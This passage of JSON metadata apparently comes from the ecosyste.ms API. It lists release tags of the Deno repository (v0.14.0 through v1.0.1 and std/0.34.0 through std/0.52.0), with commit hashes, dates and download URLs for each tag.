ifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01: